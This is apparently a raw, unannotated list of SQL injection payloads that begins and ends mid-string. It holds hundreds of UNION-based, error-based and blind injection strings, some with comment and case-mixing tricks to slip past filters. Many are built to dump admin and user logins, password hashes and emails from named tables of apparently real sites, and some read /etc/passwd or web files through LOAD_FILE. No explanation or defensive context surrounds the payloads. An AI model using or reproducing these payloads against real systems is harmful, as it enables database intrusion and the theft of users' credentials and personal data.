cc3CubeCart_admin_users limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 342 or (1,1)=(select count(0),concat((select version() from information_schema.columns limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -343111 union select 1,2,concat_ws(0x3a,id,user_username,user_password,user_email,user_firstname,user_lastname),4,5,6,7,8,9,10,11 from users limit 0,1-- -3436 union select 1,2,user(),database(),5,6,7,8,9/* 3437 and lower(user())=char(0x64,0x76,0x67,0x75,0x40,0x77,0x33,0x2e,0x64,0x76,0x67,0x75,0x2e,0x72,0x75) 3442 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23-- 3444179865 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 34443327986557 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 344646 union select 1,concat_ws(0x3a,login,password,permissions),3,4 from admins -- -3448449 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13-- -344 union select 1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,version(),database(),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- 344 union select 1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 limit 1,1/* -344 union select 1,2,3,4,concat_ws(0x3a,name,login,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from wm_users-- -344/**/union/**/select/**/1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/members-- -3452 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),11,12 -3458 and 1=2 union select 1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9,10 from userlist limit 1,1-- 345 and 1=2 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 -- -345 union select 1,2,concat_ws(0x3a3a,pseudo,mdp,admin),4,5,6 from users -- -3461 and 1=2 union select 1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13 -- -3461 union select 1,2,3,4,5,table_name,7,8,9,10,11,12 from INFORMATION_SCHEMA.TABLES/* -3462 union select 1,table_name,3 from information_schema.tables limit 992,1/* 346645645654654656 union select 1,concat_ws(version(),user()),3,4,5,6,7,8,9,10,11-- -3468 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49.50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,71,72,73,74,75,76,77,78,79,80-- 3469' and (1,1)=(select * from (select name_const(version(),1),name_const(version(),1)x1)x2)-- -346 union select 1,2,3,4,5,6,7,concat(database(),0x20,version(),0x20,user()),9,10,11,12,13,14,15,16,17,18,19,20-- -346 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13/* -347 union select 1,2,group_concat(column_name),4,5 ,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=0x494d45495f7573657273-- -347' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/* 34807 and 0 union select concat_ws(0x3a,password,email),null from u7138.User limit 0,1-- 34848' union select 1,load_file('/var/www/vhosts/video-2-cul.com/httpdocs/bas.php'),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user/* -3484 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 348 and 1/* 348 and 1=0 union select 1,concat_ws(0x3a,Version(),User(),Database()),3,4,5,6-- -348 union select 1,2,3,4,5,version() -- 348 union select 1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6,7/* -348 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_name>0x7461626C655F343030-- -348 union select concat(login,char(58),pass) from users/* -3495 UNION SELECT 1,2,3,4,5,LOAD_FILE(0x2F6574632F706173737764),7,8,9,10,11,12,13,14,15,16,17,18,19,20 34-999.9 union select 1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- 34-999.9 union select 1,2,version(),4,5,6-- 34 and 1=0 union select 1,2,3 34 and 1=0 Union Select 1,2,3,version(),5,6,7,8 ,9 ,10 34 and 1=0 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5-- 34 AND 1=0 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 34) and 1=2 union select 1,2,group_concat(concat_ws(0x3a,userbane,password)) from sporadmin -- 34 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- 34 union select 0,1,2,3,4,5,concat_ws(0x2F,user())-- -34 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- -34 union select 1,2,3,4,5,6,7,8,9,10,11,convert(version() using latin1),13 -- -34 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -34 union select 1,2,3,4,5,6,7,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),9,10/* -34 union select 1,2,3,4,5,6,7,database(),9 /* -34 union select 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,0,1,2/* -34 union select 1,2,3,4,concat(username,char(58),password) from calendar.users limit 0,1-- 34 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11 limit 1,1/* -34 union select 1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- -34 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -34 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6-- -34 union select 1,2,3,group_concat(id,0x3a3a,login,0x3a3a,password),5 from base_user-- -34 union select 1,2,3,table_name,5,6,7,8,9 from information_schema.tables -- -34 union select 1,2,concat(login,0x3a,pass,0x3a,ip) from my8pref_adm_usr limit 0,1/* -34 UNION SELECT 1,2,concat(username,0x2c,userpass),4,5 FROM poll_user/* -34 union select 1,2,concaT(version(),0x3a,database(),0x3a,user()),4,5,6 from users limit 1,3/* -34 union select 1,2,concat_ws(0x3a3a,version(),user(),@@version_compile_os),4,5,6-- -34 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15-- -34 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9 -34 UNION SELECT 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7/* -34 union Select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,0,11,12-- -34 union select 1,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),3,4,5-- 34' union select 1,concat_ws(0x3a,version(),database(),user()),concat_ws(0x3a,email,city,address,phone,fax,icq),4,5,6,7,8,9,10 from orders where email<>1/* -34 union select 1,DATABASE(),user(),4,5,6,7/* -34 union select 1,group_concat(table_name separator 0x3a),3,4,5 from information_schema.tables-- -34 union select 1,unhex(hex(version())),unhex(hex(concat_ws(0x3a,password,user))),4 from mysql.user limit 1,1/* -34 union select 1,version(),3,4,5,6,7-- -34 union select concat_ws(0x3a3a,id,login,password,name,sections,items) from qtyrs_users limit 1,1 -- -34 union select concat_ws(0x3a,LogAdmin,PwdAdmin),2,3,4 from administrateurs-- -34 union select concat_ws(0x3a ,user(),database(),version()) from cms_users 34' union select concat_ws(0x3,version(),user(),database())/* 34 union select null,password,null,null,null,null,null,null,null,null,null,null,null,null,null from mysql.user/* -34 union select unhex(hex(version())),2,3-- -35059 UNION SELECT 1,2,3 from mysql.user/* -3508 union select 1,2,3,4,concat(table_name,0x3a,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns/* 350 aNd 1=0 UNION SELECT 1,version() -- -350 union select 1,2,3,version(),5,6,7,8 /* -3510 union select 1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- -35180' union select concat_ws(0x3a,version(),database(),user()),2-- -35-1 union select 1,version(),3,database(),user(),6-- -351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -35207 union select 1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12 from users/* 3520 AND (version() like char(51,46,50,51,46,53,52)) -3523 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14-- -3524 union select 1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 from information_schema.schemata 3525 and 1=(select cast(usename||chr(58)||passwd as int) from pg_shadow limit 1 offset 1) -352 union select 1,concat(user_name,0x3a,user_pass,0x3a,user_email) from groove_user limit 0,1/* 3531 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('TypePaher','News','Visits_page','all_kn_z_1','Post','__BAKU','__Export','__OzonPicturesBig','__OzonPicturesSmall','__vw_baku','_Temp_New_Price_FileName','_vw_All_Book','_vw_BigMir_XML_currency','_vw_BigMir_XML_Item','_vw_BigMir_XML_Price','_vw_BookLit_Price','_vw_Coef_For_Report_TOP1000','_vw_CustomerGross','_vw_DeliveryToPayment','_vw_Discount_Book','_vw_New_Publishing','_vw_New_SeriesThema','_vw_OBV_Catalog','_vw_OBV_Export_1','_vw_Price','_vw_Report_TOP50_Author','_vw_Report_TOP50_Publishig','_vw_site_Menu','_vw_Subscribe_News','_vw_View_Zayavka','1c','Account_Jur','Account_Private','Action','all_kn_z','BHV','Bonus','Book_for_portal','BooksPrice','BooksZakaz','bs_ozon','BSM_BooksPrice','CatalogBooks','CatalogNum','CatalogThema','Club','Coef','cost_delivery','CounDaliv','Country','Currency','CurrencyUse','Dalivery','Date_Export','Doc','Dolg_Books','Dolg_Books_K','Dolg_Books2','Dostavka','dtproperties','Enterprise','Entr_D','Exchange','FD','ForgetOrder','GuestBook','Instore','komplekt_z','komplekt_zakaz','Konkurs','MaxRealReestrK_ID','MaxRealReestrP_ID','Message','MessageInProcedure','MiniPortal','NameNews','Not_Form_Ozon','NotMoney_NP','Obzor','Opl_N_Otpr','Other_Z_Kn','Pather','Payment','Picture_URL','Portal','Portal_Books','Postperevod','PP_ACTION','PP_ADM','PP_NAMES','PP_PAYMENTS','PP_TYPE','Publishing','QuestAnk','Question','QuestionAnswer','Quickly','ReestrK','ReestrP','Regions','Release','SendNews','Series','Shipment','Statement','subscriber','subscription','sysconstraints','syssegments','Talk','tbl_BookAdvice','tbl_Catalog','tbl_Catalog_To_Best','tbl_Catalog_TOP5_Best','tbl_CatalogToGoods','tbl_CatologTree','tbl_CorparateOrder','tbl_DistrictUa'))-- -3539 union select concat_ws(0x3a3a,id,login,password) from roots -- -353 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14 from mysql.user-- -3549 UNION SELECT CONCAT(0x3a,(SELECT CONCAT(members_password,0x3a,members_email) FROM pcrakit_cmscatalog.cms_members LIMIT 50,1),0x3a)-- -3549 union select concat_ws(0x3a,user(),version(),database())-- -354 union select 1,2,3,4,5,6,concat_ws(0x2f,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61/* 354 union select 1,2,concat(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 limit 1,1/* -354 UNION SELECT 1,2,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) -355.00 union select USER/**/ -3552 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables/* -35532 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(login,0x3a,pass,0x3a,email),30,31,32,33,34,35,36,37,38,39,40,41,42,43 from users limit 3001,1-- 3555443437798798 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41-- -3557' union select 1,2,user(),4,version(),6,7,8,9,10,11,12,13,14,database(),16,17,18,19,20,21,22/* 35591' union select 1,2,3,version(),user (),database(),1,1,9,10,11,12,13,14,15; -- -355 union select 1,2,concat_ws(0x3C62723E,name,pwd,email),4 from users limit 2513,1/* -355 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9 from admin/* -355 union select 1,concat_ws(0x3a,user_LOGIN,user_PASSWORD,user_EMAIL),3,4,5 from users/* -355 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables -- -3565 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from users/* -356 UNION SELECT 0,1,2,3,4,5,concat_ws(0x0b,user(),version(),database()),7,8,9,10,11,12,13,14 -- -356 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5-- -356 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -3570 union select 1,unhex(hex(version())),3,4,5-- -35727 union select 1,COLUMN_NAME,3,4,5,6 from INFORMATION_SCHEMA.COLUMNS-- -357 unioN seLect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,20,21,22,23/* -357 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(user,char(58),password) from mysql.user/* 3586 or 1 group by concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),rand(0)|0) having min(0)-- 35968 and 1=2 union select 1,@@version -- 35-999.9 union select 1,2,3,4,5,6,7,8,9,10-- 359 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat(kennung,char(58),vorname,char(58),nachname,char(58),g_mail,char(58),passwort,char(58),g_firma,char(58),g_strasse,char(58),g_ort,char(58),g_plz) from op4_admin limit 0,1),1,64),floor(rand(0)*2))) -359 union select 1,concat_ws(0x3a3a2020,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 35 and 1=2 union select version(),2,3-- 35 limit 0 UNION SELECT 1,CONCAT(version(),database(),user()),3,4-- 35 limit 0 UNION SELECT 1,CONCAT(version(),database(),user()),3,4,5,6,7,8-- -35 union select 1,2,3,0x7265616c20706f63616e69,5,6,7,8,9,10,11,12,13-- -35' union select 1,2,3,4,5,6,7,8,9/* -35' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105 /* -35 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,tstamp,username,password,admin),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 from be_users /* -35 union select 1,2,3,4,5,6,7,concat_ws(0x3a,loginname,pass) from xs_users/* -35 union select 1,2,3,4,5,6,7,table_name from information_schema.tables /* 35' union select 1,2,3,4,5,6,concat_ws(0x20,user_login,user_password),8,9,10,11,12,13,14 from cms_users/* -35 UNION SELECT 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),7-- 35 UNION SELECT 1,2,3,4,CONCAT(version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 LIMIT 1,1-- -35 union select 1,2,3,4,concat_ws(0x3a3a3a,tuktuk_system_user_name,tuktuk_system_user_password,tuktuk_system_user_email),6,7,8,9,10,11,12,13,14,15 from tuktuk_system_user -- -35 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10-- -35' union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from information_schema.tables/* 35 union select 1,2,3,concat_ws(0x2f,user(),version(),database()),5,6,7,8/* -35 union select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os) -- -35 union select 1,2,3,user,5,6,7,8,9,10,11,12,13,14,15 from admin/* 35 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(version(),database(),user()),0x71),0x71),4,5,6,7,8,9,10,11-- 35 union select 1,2,concat(version(),0x3a,database(),0x3a,user()) limit 1,1/* -35 union select 1,2,concat_ws(0x3a3a,ID,Link,Name,MainSite,ExampleURL),4 from websites -- -35 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from members limit 6,1 -- -35 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8-- -35 union select 1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6-- -35 union select 1,2,group_concat(concat_ws(0x3a3a3a,cat_id,root_cat,name_cat,descr,sh_descr,img,por) separator 0x2a2a2a) from category-- 35' union select 1,2,version(),4/* -35' union selecT 1,2,version(),4-- -35 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/* 35 union select 1,concat(version(),database(),user()),3,4,5-- 35' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- -35' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,11,12 -- -35' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7 -- -35 union select 1,concat_ws(password),3,4,5,6,7,8,9,0,1,2 from user -- -35 union select 1,fullname,3,4,5,6,7,8,9,pwd,11,12,13,14 from admin/* -35 union select 1,group_concat(admin_user_id,0x3a,admin_userid,0x3a,admin_password,0x3a,admin_password_expiry),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from tbl_user_admin-- -35 UnIon selECt 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables-- 35 union select 1,user(),version(),database(),5,6,7,8,9,10,table_name from information_schema.tables-- 35 union select 1,@@version,3,4 from presspage -35 union select concat_ws(0x2b,version(),user(),@@version_compile_os) -- -35 union select concat_ws(0x3a,version(),user 35 union select concat_ws(0x3a,version(),user(),database()),null-- -3600 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(table_name),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 from information_schema.tables -- -3601 union select 1,2,3,4,concat_ws(0x3a,user_name,user_pwd),6 from users limit 0,1/* -3608 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12 360 UNION SELECT 1,concat(username,0x3a,user_password),3,4,5 from gurujen_forum.phpbb_users/* 360 union select 1,login,3,pass,5 from users/* 3619' union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6 -- 361 UNION SELECT 1,2,3,concat_ws(0x05,ID_MEMBER,ID_GROUP,memberName,passwd,passwordSalt,emailAddress),5,6 FROM forum.smf_members limit 1,1/* 361 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 361' UNION SELECT 1,concat_ws(0x203a20,database(),user()),3,version(),5,6/* -361 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 36231 and 1=-1 union select 1,2,3,concat(email,0x3a,pass),5,6 from users limit 0,1/* 36240' union select LOAD_FILE(0x2F6574632F706173737764) from mysql.db -- -362 union select 1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a3a,user,pass,typeAbonnement),0x71),0x71),3,unhex(hex(user)),5 from tMembres -- -362 union select 1,concat_ws(0x3a,cast(version() as binary),cast(database() as binary),cast(user() as binary)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -362 UNION SELECT T.B,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM (SELECT ROWNUM R,BANNER B FROM V$VERSION) T WHERE R=1 -- 363-1.1 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -363 union select 1,2,3,concat(user(),version()),5,6/* -3644 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from users/* -364 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()) -- -364 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16 -- 365) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- 365 union select id,concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10 from members limit 825,1000/* -366041 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9-- 3660 union select 1,concat(0x3,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14 -3662 union select 1,concat(@i:=0x00,@o:=0x0d0a,benchmark(15,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),3,4,5,6,7,8,9,0,1,2,3 -- 366655544433379877 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5-- 3666709767809809 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73-- 366937809809877 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16-- 366-999.9 union select 1,2,3,4,version(),6,7 -- -366 union select 1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10 from 1tort_users/* -366 union select concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9/* 367 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(0x3a,username,0x3a,password) from lore_users limit 0,1),1,64),floor(rand(0)*2)))-- 3687389798798761 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat_ws(0x3a,user(),version(),database()),32-- 3687655448 union select concat_ws(0x3a,version(),user(),database()),2-- 36876876876098097 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 3687 AND 108ascii(lower(substring(version(),1,1)))limit 0,1) limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- -3 or ascii(substring((select anket_forms.email from fordnnov.anket_forms order by id limit 0,1),1,1))=97 3 union all select 1,2,concat_ws(0x2020203a2020203c62723e,table_name,table_schema),4,5,6,7 from information_schema.tables 3 UNION SELECT 0,0,0,0,concat_ws(0x3a,version()),0,0,0,0 from idesk_user-- -3 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7/* 3 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15/* 3 union select 1,2,3,4444,5,6,7,8,9,10,1,2,3,44444,5,6,7,8,9,10,1,2,3,123123123213,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9-- 3 union select 1,2,3,4,5,6 /* -3 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- -3 union select 1,2,3,4,5,6,7,8,9,10,11 -- -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764/* -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -3 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59/* -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from partners/* -3 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- -3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(table_name) from information_schema.tables-- 3/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,table_name,16/**//*!from*//**/information_schema.columns-- -3 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(version(),0x3a,user(),0x3a,database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- -3 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),database(),version()),12,13,14,15,16,17,18,19,20-- -3' union select 1,2,3,4,5,6,7,8,9 from information_schema.tables -- 3 union select 1,2,3,4,5,6,7,8,9,group_concat(concat_ws(0x3A,username,user_password) SEPARATOR 0x3c62723e),11 from incubator_tsu_ru.phpbb_users where user_level=1-- -3/*!union select!*/1,2,3,4,5,6,7,8,9,version(),11,12,13 -3 union select 1,2,3,4,5,6,7,8,concat(username,0x20,password),10,11,12,13,14,15,16,17 from cmsUsers-- -3 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version())-- -3 union select 1,2,3,4,5,6,7,8 from mysql.user /* -3 union select 1,2,3,4,5,6,7,8,user(),10/* -3 union select 1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/* -3 union select 1,2,3,4,5,6,7 from mysql.user/* -3 union select 1,2,3,4,5,6,7,table_name,9,10 from information_schema.tables /* -3 union select 1,2,3,4,5,6,7,version(),9,10/* 3 union select 1,2,3,4,5,6,concat(user(),version(),database()),8 from information_schema.tables -3' union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8 -- 3 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14 limit 1,1 3 union select 1,2,3,4,5,6,concat_ws(char(58),name,email,password),8,9,10,11,12,13 from members/* 3 union select 1,2,3,4,5,6 from information_schema.tables-- -3 union select 1,2,3,4,5,6,group_concat(0x0b,table_name),8 from information_schema.tables-- 3 union select 1,2,3,4,5,6,table_name,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13 FROM INFORMATION_SCHEMA.tables limit 1,30 -- 3 union select 1,2,3,4,5,6,unhex(hex(database())),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- 3 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -3 union select 1,2,3,4,5,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),7,8,9,0,1-- -3 union select 